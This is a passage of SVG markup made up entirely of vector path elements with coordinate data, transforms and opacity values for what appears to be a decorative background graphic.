transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1841.25,93.09l-2.65,1.15c-.44,1.45-.88,2.9-1.39,4.61l7.11-3.44-1.62-1.88Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1805.12,94.7l.12,1.32c1.9.79,3.55.73,4.61-1.34l-2.87-1Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1610.26,74.9c-3-2.13-6.32-3.74-9.72-5.7-1.09,2.47-1.5,4.62-4.13,3-.25-.15-1.88,1.28-2.25,2.23-.27.7.45,1.8.76,2.82l-3.83.53a15.57,15.57,0,0,1-.45-3.63c.42-3.24-2.32-3.61-4.14-4.18-2.08-.66-4.46-.36-6.71-.47-4.33.72-1.18,5.15-3.41,8.37l-3-5.61c-5.69-1.77-11.75,2.1-17-2a.46.46,0,0,0-.33-.07c-3.42.13-6.84.22-10.25.46a7.76,7.76,0,0,0-2.34,1,76.7,76.7,0,0,0,11,.88c3.11,0,6.07,3.85,9.82,1.13,4.48,2.21,9.91,2.83,12.88,7.72,2.49-.31,4.22-1.21,4.2-4.18,0-.68,1.05-2,1.44-1.94a3.9,3.9,0,0,1,2.48,1.54c.49.79,0,2.29.57,2.91a21.57,21.57,0,0,0,3.84,2.76c.55-2,1.63-2.65,3.75-2,1,.3,2.26-.22,3.4-.36l.61-.79c.34-1,.42-2.56,1.06-2.83,2.55-1.06,5.31-2.4,7.91-2.24,1.38.09,2.58,3,3.87,4.69l.85.6,4.24-4.74-.08,0-.07-.06C1613.61,75.42,1612.25,76.32,1610.26,74.9Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1672.05,77.23c-7.14,2.24-12.93-.67-18.27-5.13-2,1.79-4.39,3.18-5.58.06s-3.12-3.37-5.78-3.25a10.49,10.49,0,0,1-3.93-.59c-4.74-1.76-11.18.87-13.09,5.71a36,36,0,0,1-3.67-1.4c-3.2-1.64-4.49-1.26-6.49,2.07l.07.06.08,0c3.23.21,6.47.29,9.67.68,1,.13,2,1.08,3,1.65,2.17-.16,4-.47,3.94-3.46,0-1,1.46-2.37,2.55-2.75.7-.25,2,.95,2.9,1.6.54.37.87,1.24,1.42,1.38,5,1.3,10.1,2.46,15.14,3.74,2.52.64,5,1.52,7.51,2.18,1.6.42,3.25.65,4.88,1l1.9-1,4-1.18,1.11-.79a2.61,2.61,0,0,0-.08-.55Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1418.08,75.15l-2,1.17A2.8,2.8,0,0,1,1411.7,74c-.08-2.55-1.19-2.8-3.27-2-1.73.62-3.53,1-5.69,1.6-.74,2-1.7,4.51-2.34,6.2-2.42,0-5.09-.22-5.19.16a12.83,12.83,0,0,1-1.06,3c2.55.09,4.55-2.42,7.06-1.16.26-.38.5-.77.75-1.18.9-1.51,2.64-3.34,4.15-3.49a16.85,16.85,0,0,1,7.51,1.39c.92.37,1.21,2.37,2.16,4.46,1-3.19.65-6.75,4.61-6.79-.18-.64-.36-1.28-.59-2.08Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1521.68,67.32a3.24,3.24,0,0,0-2.29.3c-3.15,2.53-6.32,1.19-9.62.47-1.15-.26-2.56.65-3.85,1,3.86.44,7.7,1.08,11.57,1.25,4.37.19,8.78-.25,13.15,0,3.83.2,7.63.94,11.44,1.44a11.89,11.89,0,0,0-2.91-1.47C1533.35,69.22,1527.52,68.26,1521.68,67.32Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1432.47,69.35c-2.84-.79-6.83,2.34-7.59,5.52l9.91-2.57C1434,71.27,1433.44,69.62,1432.47,69.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1494.72,69.78c1.49-.63,3.52.08,5.31.07a7.58,7.58,0,0,0,1.93-.52L1491.9,68C1492.27,69.4,1492.31,70.81,1494.72,69.78Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1823.13,91.5c2.2,1.79,4.19,4,6.66,5.22,1.69.84,4.32,1.3,5.58-1.44-3-1.35-5.89-2.82-8.94-4C1825.5,90.94,1824.24,91.41,1823.13,91.5Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1803.27,96.36l-3.54-.31C1800.73,98.26,1801.87,98.73,1803.27,96.36Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1899.21,117.79l.45.23-.06-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1899.32,115.94l-1,1.4.9.45.39-.15C1899.5,117.07,1899.41,116.5,1899.32,115.94Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M829.91,17.17c3.32,1.48,6.16,4,8.5,5.66.69,2.1.83,4,1.82,5,.54.56,2.52-.25,3.85-.44L844,26.26l-3.13-1.57,1.68-4.79.52.89,5.46-.74c2.14,1.1,3.93,2,5.74,2.95,1.08.55,2.9.83,3.16,1.63,1.61,4.89,4.53,2.43,7.35,1.72a17.15,17.15,0,0,1,4.64,0c.77,0,1.59.45,2.3.29,3.48-.78,6.07.56,8.42,3s3.3,2.39,5.56-.86h0l0,0h0c-1.9-.49-4-.6-5.64-1.55-2.79-1.6-5.49-3-8.83-2.53a1.37,1.37,0,0,1-.67,0c-2.43-.85-4.8-2.09-7.29-2.46-2.32-.35-4.77.22-7.41.4.25-1.64.44-2.83.62-4l-5.58-2.33-1.28-.27c-1.13.42-2.29,1.24-3.4,1.17-2.26-.13-4.56-1.22-6.33,1.25a3.36,3.36,0,0,1-2-1,4.6,4.6,0,0,0-4.76-2.91c-2.65,0-5.3-.43-8-.67L823,12.54l-4,0-1.36,1.23a11.41,11.41,0,0,0,2.6,1.37C823.45,15.84,827,15.86,829.91,17.17Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M628.92,64.11a4,4,0,0,0,2.57-1.64c1.61-3.27,4-2.52,6.27-1.29,3.89,2.08,8,1.82,10.88-.64l6.54.81c.05.43.13,1.18.18,1.61,6.45-2.75,14.07-1.15,19.28-6.26,4,3.24,3.87,3.16,7.22-.54a4.35,4.35,0,0,1,3.43-.95c3.6.59,6.43-.35,8.67-3.28s3-2.8,5.56,0l2.38-2.67a13.59,13.59,0,0,0-3.13-1.19c-3.33-.42-3.45-2.07-2.27-4.71.34-.74-.37-1.91-.45-2.9s0-2.27,0-3.41c1.2,0,2.64-.41,3.55.12a30,30,0,0,1,4.4,3.71c-.4-.91-1.31-2-1.11-2.71.86-3.1-.42-3.09-2.93-2.79-1,.12-2.25-1.43-3.39-2.22a14.65,14.65,0,0,1,2.5-1.72c1.06-.45,2.31-.45,3.37-.89.76-.32,2-1.2,1.91-1.55a22.79,22.79,0,0,0-1.6-3.82L699,26c.5-1,.78-2.26,1.56-2.94a29.86,29.86,0,0,1,4.4-2.71c.47,1,1,1.58,1,2.15-.08,2.06.56,4.18,2.67,3.75,1.19-.24,2-2.77,2.79-4.36.27-.53-.11-1.35,0-2,.18-1.56.46-3.11.7-4.66l.94-.57c2.37,4.62,5.35,3.84,8.33,1.56,1.77-1.36,3.91-2.68,4.86-4.55,1.87-3.63,2.13-4,6.66-2.81l-1.71,4.17c2.19,0,3.65.07,5.11,0,2-.12,4.31,1,5.73-1.59.21-.39,2-.5,2.47-.08,2.2,1.88,4.7.78,7,1.14a74.34,74.34,0,0,1,7.66,2,7.56,7.56,0,0,0,1.82.32c1.35,0,2.9-.49,4,0,2.42,1,4.58,2.68,6.93,3.9a14.93,14.93,0,0,0,3.31.88c0-1.07-.14-2.14-.07-3.19s.2-3.15.54-3.2a34.09,34.09,0,0,1,7.62-.28c.21,0,.26,2.7.33,4.15a13.6,13.6,0,0,0,0,2.71c.31,1.18.71,3,1.46,3.27,1.8.53,4,2.17,6-.42-.76-.89-1.8-1.63-2.08-2.59a4.11,4.11,0,0,1,.35-3.22,75.25,75.25,0,0,1,5.12-5.76l-4.23-.85h-1.75a23.59,23.59,0,0,1-4.87.23c-4.93-.78-9.8-1.94-14.74-2.64A7.7,7.7,0,0,0,764.73,9a12.36,12.36,0,0,1-11.05.46c-.51-.21-1.33-.55-1.59-.33-3.85,3.18-5.5-2.22-8.51-2.15-.06,0-.12-.41-.18-.62l-1.29.11c-2.07,3.28-4.58,3-7.61-.72l-4,0-8.09,4c-1.32-.92-3.16-1.42-4.43,1.62-.64,1.52-2,1.41-2.69-.2A31.91,31.91,0,0,1,714.1,7l-4.7.72c-.26.87-.58,1.72-.79,2.59-.65,2.77-1.66,4.61-4.66,2a1.92,1.92,0,0,0-1.27-.45C694,12.55,686,9,677.53,7.84c-7.12-1-10.72,2.1-15.18,6.16l-.93-2.22c-2.34.47-4.46.84-6.55,1.35-1.41.35-2.76.91-4.14,1.36s-3,.95-4.43,1.4c-2.86.87-2.94,3.58-2.8,5.56.17,2.28,1.58,4.46,2.5,6.81,3.22-2.47,1.91-7.61,6.6-9-1.43,5.66-2.78,11-4.11,16.31h8.27l1.52-2L660.16,35a62.13,62.13,0,0,0,6.15-1,6.4,6.4,0,0,0,2.42-1.67c2.82-2.66,4.43-2.49,6.69.82.5.74.89,1.55,1.33,2.33l1.27,0c3.29-1.6,4.49.31,5,2.79,1.88.76,3.88,1,5,2.18a5.3,5.3,0,0,1,1.31,4.43,5.08,5.08,0,0,1-3.59,2.81,45.42,45.42,0,0,1-10.16,0,7.44,7.44,0,0,1-4.27-2.35c-2.85-3.18-3.63-3.18-5.73,1.12-.32-1.48-.56-2.59-1-4.78l-5.06,7.23c-8.42-4.81-7.21-4.6-12.22.4-1.86-2.11-4.43-4.06-6.74-2-1.57,1.36-6.06.63-5.15,4.57h7a17.25,17.25,0,0,1,.21,3.11,29.4,29.4,0,0,1-.88,3.44,13.22,13.22,0,0,1-3.1-1.4c-1.86-1.49-3.39-1.28-5.13.2a2.66,2.66,0,0,1-2.33.28c-.43-.18-.58-1.34-.58-2.07,0-2,.15-3.93.24-5.9l-1.5-.44-4.38,5.54c.44,2.07.87,4.15,1.3,6.21-5.57,1.5-5.57,1.5-5.65,3.89,1.33-.18,2.63-.43,3.94-.51A35.87,35.87,0,0,0,628.92,64.11Zm31-43c-.86-.22-1.49-1.36-2.23-2.1.66-.59,1.27-1.59,2-1.67s1.46.81,2.2,1.27c.2.44.4.87.59,1.31C661.61,20.33,660.63,21.25,659.92,21.08Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M985,55.33c1.46-2.15,3-1.15,4.76-.44,5.9,2.42,12,3.57,18.34,2.29.65-.12,2,.4,2.1.83.72,3.42,3.4,3.9,6.1,4.17,6.63.67,13.45,2.49,19-3.39.76-.81,2.85-.92,4.13-.58,4.64,1.21,9.25,2.57,13.75,4.2s7.75.24,9.1-4.07a10.62,10.62,0,0,1,.93-1.83c1.5,2.4,2.88,4.59,4.67,7.46,2-2.3,3.74-4.51,5.69-6.53.87-.9,2.23-2,3.22-1.92s2.08,1.55,2.91,2.57,1,2.73,1.83,3c3.21,1,6.57,1.61,9.87,2.35.5-1.36,1-2.72,1.44-3.87l-9.51-3.68c.26-2.06,1.18-4.23.5-5-1.34-1.55-3.45-2.5-5.7-.66-.7.57-2.06.26-3.1.48-1.46.31-3.25.32-4.28,1.19-2.55,2.15-5.08,1.41-8.44.93l6-4.6-.54-1c-2.62.6-5.77-1.68-7.81,2.27a75.78,75.78,0,0,1-4.52,7l-5-4.48c-3.75.55-7.67.15-11.14,2.29-.61.38-1.7,0-2.58,0-2.43-.07-5.53-1.09-7.16,0-2.81,1.92-5,3.09-8.39,1.6-1.68-.74-3.94-.25-5.58-1-5.87-2.85-11.71-3.89-17.88-1.09-.41.18-1.15-.31-1.71-.55s-1.53-1.05-1.94-.85c-4.21,2.08-8.5-2.77-12.67.18-.17.13-.9-.23-1.14-.54-1.95-2.59-3.37-1.33-4.72.6,2.66,1.1,5.3,2.25,8,3.27A1.59,1.59,0,0,0,985,55.33Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M409.63,67.73c2.4.08,4.82-.07,7.23-.13a2.58,2.58,0,0,1,1.94-.47,8.4,8.4,0,0,0,1.4.43,4.27,4.27,0,0,1,1.22.21c3.68.44,7.7-.46,10.67,2.75.18.2.62.21,1,.25l17.24,2.13v3.48l11.92-2c5.85-1,10,3.53,15.15,4.94,3.69,1,6.73,1.89,10-.58,1.47-1.11,2.59-3.55,5-1.2.17.17,1.73-.58,2.1-1.21a40.76,40.76,0,0,0,2.08-4.91l-3.05-1.14-2,1.35-.95.4-.4,1c-.4.62-1,1.83-1.18,1.77-3.22-1.15-7.18.12-9.79-3l-3.3-.12c-.48,2.5-2.2,2.1-3.94,1.71A45.91,45.91,0,0,0,467,72.33c-2.9-.35-6.4.42-8.61-1-4.34-2.7-8.77-1.22-13.12-1.78-3.89-.5-8-.54-11.59-1.87-5.92-2.19-11.91-1.64-17.91-1.77-2.64,0-5.27,1.05-7.93,1.07A2.23,2.23,0,0,0,409.63,67.73Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M528.33,60,532,62.45l1-.27,2.73-2.76,2,2.1a1.43,1.43,0,0,0,.16.57c2,2.19,1.8,4.12-.66,6.21a1.48,1.48,0,0,0-.19.57c0,.71.06,1.42.08,2.13.91,0,2.15.29,2.65-.18,2.74-2.53,4.64-1.92,6.27,1.18a2,2,0,0,0,1.64.63c.48-.5,1.07-1.51.86-2-1-2.06.52-5.25-2.83-6.36-.17,0,.1-3.21.62-3.36,5.07-1.48,8.48-7.13,14.61-5.91.16,0,.45-.66.68-1l-.74-1.36.07-.12-3.44-.5-8.15,0-4.79.53c-.91,2.39-1.8,4.34-5.06,2.42A10.91,10.91,0,0,0,534,54c-3.57.08-6.12,2.92-5.72,6Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M797.9,16.16c4.54,1.39,4.73,1.71,3.73,5.93,5.87,2.82,12.19.84,19.09,1.15L818.5,19c-2,1.22-3.54,2.9-4.49,2.61-2-.6-3.28-2.38-2.1-4.74l.71.53,3.64-3.57c-4-2.19-8.21-1.74-12.42-.6-1.08.29-2.19.49-3.28.74V9.76l-4,.62v.69C797,12.75,794.67,15.18,797.9,16.16Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M898.68,32.93A23.5,23.5,0,0,1,905,36.22c2.23,1.52,4.15,3.79,7.08,1.3a1.55,1.55,0,0,1,1.24-.28c3.11,1,6.21,2.07,9.67,3.24a6.75,6.75,0,0,1,8.71,1.39c1.94,2.4,6.73,2.33,9.15-.14a9.88,9.88,0,0,0-2.6-1.37c-8.16-1.43-15.42-6.32-23.95-6.26-2,.87-3.89,1.8-5.89,2.54-.32.12-1.27-.57-1.38-1a2.27,2.27,0,0,1,.64-1.7,19.13,19.13,0,0,1,2.13-1.87l-.15-.16-2.89-.56a48.5,48.5,0,0,0-5.84-2.1,17.66,17.66,0,0,0-4.35.07C896.65,30.87,896.43,32.29,898.68,32.93Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M600.59,62l2.14-1.93.07.87c2.81.33,5.62.75,8.44.87.42,0,1.19-1.39,1.28-2.2a10,10,0,0,0-.53-2.94c-.68-.56-1.32-1.17-2-1.67-3.19-2.25-6.4-4.47-9.6-6.71l-1.28,0c0,.3,0,.59,0,.89l3.51,2.9C598.91,57,598.36,59.78,600.59,62Z\" transform=\"translate(0 0)\"\n          opacity=\"0.1\"></path>\n        <path d=\"M793.24,26.65a4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76-1.26-3.64-.74-7.86-5.65-8.65-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0A12.07,12.07,0,0,0,793.24,26.65Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M945.42,45.14a7.4,7.4,0,0,1,2.3.36c4.19,1,8.38,2,12.55,3,1.46.37,3.3.56,4.23,1.54,2.66,2.8,5.85,2.55,9.14,2.33-3.18-1.55-6.24-3.5-9.58-4.56-4.33-1.36-8.92-1.9-13.34-3-2.63-.66-5.17-1.72-7.75-2.59C942.68,44.16,943.16,45.34,945.42,45.14Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M705.23,41.47c.24,1,.49,2,.74,3,1.37.31,2.73.68,4.11.92a2.43,2.43,0,0,0,1.77-.14,2.19,2.19,0,0,0,.6-1.77C712.08,41.86,706.69,40.44,705.23,41.47Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M566.9,62.85l4.09-.37c0-.65,0-1.31.08-2l-3.93-.7Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M566.48,55.5c.88-.51,1.75-1,2.62-1.55,0-.33,0-.66,0-1l-2.67-.39h-.72l-1.25.23-.81,1.24C564,55.73,564.79,56.48,566.48,55.5Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M885.72,28.77c2.09-.33,4.87.74,5.44-2.68l-2.07-.77-3.41,3.4,0,0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M402,64.38a12,12,0,0,0-3.8-.12l3.72,1.19C401.88,65.09,401.91,64.73,402,64.38Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M533.65,70.75l.94,2.17,1.85-1.85-1.39-.76Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1092.16,55.67c.14-.05.18-.35.26-.54l-.57-.24c-.08.19-.27.42-.21.56A.55.55,0,0,0,1092.16,55.67Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M18.44,71.94A8.27,8.27,0,0,0,18,71c-3.4-.93-11.69-5.11-18-8v6.54C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M19.56,70.79a2.81,2.81,0,0,1,1.29-2.4c3.26-1.37,7-2,9.89-3.8,3.33-2.12,6-4.61,8.93.21.19.31,1.5-.08,2.3-.14a11.13,11.13,0,0,0-.78-2.49A13.83,13.83,0,0,0,39.1,60c2-.16,3.6.18,4.53-.44,3.66-2.47,7.56-2.39,11.66-1.88.84.11,1.77-.56,2.67-.87A66.19,66.19,0,0,0,49.7,56c-2.08,0-4.12,1.07-6.22,1.3C35,58.2,26.47,59,18,59.82L13.3,64.15l.6,1.25C15.24,67.29,17,69,18,71,19.1,71.33,19.69,71.3,19.56,70.79Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M66.23,56.25c2.09.74,3.41.14,4.79-1.32a8.11,8.11,0,0,1,2.36-1.45c1.93,2.9,4,.68,6,0,.73,4.47,3.79,5.76,8.55,3.67l-2.66-3.47c2.36-.27,4.3,0,5.56-.73,3.88-2.43,7.67-1.82,11.69-.68.89.25,2.06-.52,3.11-.82L94,49.77q-8.62,1.41-17.24,2.8a2,2,0,0,1-1-.2,5.37,5.37,0,0,0-6.17,1.43,3.11,3.11,0,0,1-2.58.66,7.68,7.68,0,0,0-7.71,2.11c1,0,2,0,3-.06C63.62,56.43,65.09,55.85,66.23,56.25Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.29,66.23l-2.42-.78c0,.48,0,1-.05,1.46a22.28,22.28,0,0,0,9,3c3.72.58,8.26.5,10.54,5,.64,1.26,2.67,1.7,3.61-.49l0,0c-2.22.08-4.06,0-2.63-3.16.4-.88.23-2.77-.39-3.2a2.09,2.09,0,0,0-.52-.25c-.41,0-.82-.12-1.22-.21-.64,0-1.32,0-1.94,0l-1.4,0-.37.27c-2.69,2.28-9.66,2-11.95-.66-.2-.22-.17-.64-.24-1a7.52,7.52,0,0,0,3.54.79,2.26,2.26,0,0,1-.21-2c.19-.78-1.11-1.93-1.73-2.91a2.57,2.57,0,0,0-.14-.61c-2.85-.2-3.59,1.14-3.81,2.86A3.89,3.89,0,0,1,404.29,66.23Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M398.39,72.46c1.45-.38,3-.49,4.64-.75l-1.86-3.45c-3,3.64-5.33,3.67-8.89.42a22.56,22.56,0,0,0-4.12-2.4C389,69.59,395.25,73.29,398.39,72.46Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1899.43,110.37a4.84,4.84,0,0,0-2.63,1.43,7.83,7.83,0,0,0,2.63-1.11Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1788.06,100.5c1.9-.27,3.93.29,5.9.52,3.39.4,6.78.86,10.17,1.23.38,0,.79-.49,1.21-.52a11.9,11.9,0,0,1,3.42,0,24,24,0,0,1,3.82,1.48c.32-.46.74-.79.8-1.17.32-2.1,1.85-2.36,3.2-1.6.59.33.8,2.25.44,3.13-.76,1.86-2.44,3.59-.39,5.47,2.55,2.34,10.5,1.49,13.12-1a5,5,0,0,1,3.69-1.39c6,1,6,1.16,8.38-4.58.12-.27.43-.45,1.08-1.11,1.41,2.23,2.65,4.31,4,6.3,1.77,2.59,2.83,2.52,4.39-.13.7-1.19,1.53-2.29,2.31-3.43l1.12.12,1.85,8.84c1.67-.23,3.16-.81,4.47-.54,2.45.51,4.64,1.26,6.68-1.11.52-.61,2.25-.65,3.22-.32,7.35,2.44,15.29,3.58,21.22,9.29a6.59,6.59,0,0,0,1.53.83c2.11-1,3.77-2.24,5.51-3l-.9-.45,1-1.4,0,0c1.17-.83,2.34-1.66,3.5-2.51.49-.36.94-.79,1.41-1.18-.47-.52-.84-1.34-1.41-1.51a7.28,7.28,0,0,0-3.42-.33v.32a7.83,7.83,0,0,1-2.63,1.11,8,8,0,0,0-1.56,2.31c0-.69-.07-1.38-.08-2.07-5,.32-10.51-2.38-14.93.57,4.42-3,10-.25,14.93-.57a21,21,0,0,0-.41-4.29,38.5,38.5,0,0,0-2.41-5.92l-.92,1.3a51.21,51.21,0,0,0-5.5-.55,2.76,2.76,0,0,0-2.16,1.12c-.33.66,0,1.7.15,2.56.22,1.54.48,3.07.72,4.6-2-.32-4-.6-6-1-.6-.12-1.12-.83-1.68-.85a8.2,8.2,0,0,1-7.45-5,8.36,8.36,0,0,0-1.19-1.93c-4.34.38-7.91.8-11.48.92-.8,0-1.6-1-2.45-1.55-2.23-1.3-4.53-2.48-6.7-3.87a11.48,11.48,0,0,1-2.06-2.26l-1.31.09-7.11,3.44c.51-1.71,1-3.16,1.39-4.61l-3.23,1c-1.26,2.74-3.89,2.28-5.58,1.44-2.47-1.24-4.46-3.43-6.66-5.22l-2.63.37c-.42.3-.85.59-1.28.88L1815,92l-1.3.24-3.86,2.42c-1.06,2.07-2.71,2.13-4.61,1.34l-2,.34c-1.4,2.37-2.54,1.9-3.54-.31l-4.15-5.71-.76-.53-1.31.27-1.31.91c-2.15,1.16-4.26,2.4-6.47,3.43-1.68.78-3.49,1.3-5.23,1.93C1782,99.51,1784.34,101,1788.06,100.5Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1705.46,85.81a4.38,4.38,0,0,1,2.31,1.83c.48.62.57,1.54,1.16,3.35l3.73-5.94c.35,2.51.61,4.36.86,6.22l.77.24c1-1.51,2-3,3.23-4.79,2.69,1.59,6.16,2.57,7.75,4.86,1.93,2.75,3.55,3.7,6.59,2.4,1.4,2.3,2.34,5.58,5.88,2.53.35-.3,1.47.34,2.24.5a8.85,8.85,0,0,0,8.53-3.59l-4-3.33-3,3h0c-.52,1.87-1.45,2.1-2.77.67l-.67-.18c-1-.54-2.47-.86-2.81-1.66-2.73-6.37-7.81-7.43-13.86-6.49-2.44.37-4.15,0-3.55-3.09a.36.36,0,0,0-.25-.27c-4-.29-7.86,2.62-12,.33-.9-.5-2.86,0-3.82.74-2.33,1.78-4.2,1.33-6.39-.17-.93-.65-2.32-.65-3.5-1-.5,1.42-1,2.84-1.79,5.11,3.6-.5,6.59-1,9.59-1.3A24.79,24.79,0,0,1,1705.46,85.81Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1616.21,78.62c2-2.87,4.61-3.18,6.76-.66,2.6,3.06,2.77,3,5.06-.82-1-.57-1.93-1.52-3-1.65-3.2-.39-6.44-.47-9.67-.68l-4.24,4.74C1613.32,81.87,1614.91,80.48,1616.21,78.62Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1609,78.85c.28.23.86.08,1.31.1-1.29-1.66-2.49-4.6-3.87-4.69-2.6-.16-5.36,1.18-7.91,2.24-.64.27-.72,1.85-1.06,2.83.69-.37,1.39-.7,2.06-1.09C1604,75.56,1605,75.63,1609,78.85Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1689.47,82.26c-2.45-1.14-4.89-2.32-7.36-3.4-.47-.2-1.11,0-1.65,0-2.38-.31-4.75-.66-7.12-1l-1.11.79,16.92,3.72C1689.25,82.37,1689.36,82.29,1689.47,82.26Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1779.28,96.53c-3-3.4-6-1.4-9,0C1772.54,98.87,1776.37,98.87,1779.28,96.53Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1594.13,82.33c1.61,0,3.09.11,2.72-2.21-1.14.14-2.4.66-3.4.36-2.12-.65-3.2,0-3.75,2C1591.18,82.43,1592.66,82.29,1594.13,82.33Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M533.93,38.55c1.78-.33,3.59-.56,5.33-1a4.91,4.91,0,0,0,2.4-1.38c2.58-3,3.41-3,5.28.44.31.57.66,1.12.52.89,5.77.28,10.93.33,16,.85,2.32.23,4.13.6,5.24-2.09a9.67,9.67,0,0,1,2.74-3.41c.48-.4,1.62,0,2.46,0,.06-1.14.11-2.28.22-4.4l-3.47,2.63c-.13-1.71-.22-3-.31-4.21l-2-2.13c-3.21.4-2.52,3-2.58,4.94-.06,2.22.13,4.84-2.28,5.46-3.08.79-6.62,1.46-9.56.67-3.29-.87-3.59-6.11-1.09-8.56.6-.59.84-1.54,1.41-2.19a3.94,3.94,0,0,1,2.84-1.43,49.65,49.65,0,0,0-1.49,6.3c-.08.67,1.28,2.2,1.62,2.1a4.61,4.61,0,0,0,2.82-1.94c.4-1-.58-2.52-.25-3.59.66-2.06,1.31-4.72,2.88-5.74,2.42-1.58,5.72-1.73,8.43-3,3.87-1.76,7.72-.72,11.6-.57h0c-.16-2.46,1.55-2.79,3.33-2.69,3,.16,6,.52,9,.8L607.9,11l2.8-1.25,1.3,0,0-1.26c-3.16.74-6.38,1.27-9.45,2.28-4.88,1.61-9.67,3.15-14.91,1.84a7,7,0,0,0-3.33.25c-8.14,2.16-16.26,4.42-24.41,6.56-3.71,1-7.51,1.62-11.2,2.67-2.72.77-5.24,2.36-8,2.84-3.36.58-4.53,2.07-4.5,5.41,0,1.23-1.49,3.42-2.49,3.54-2.88.32-3.1,2-3.37,4l3.69,1.58Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path 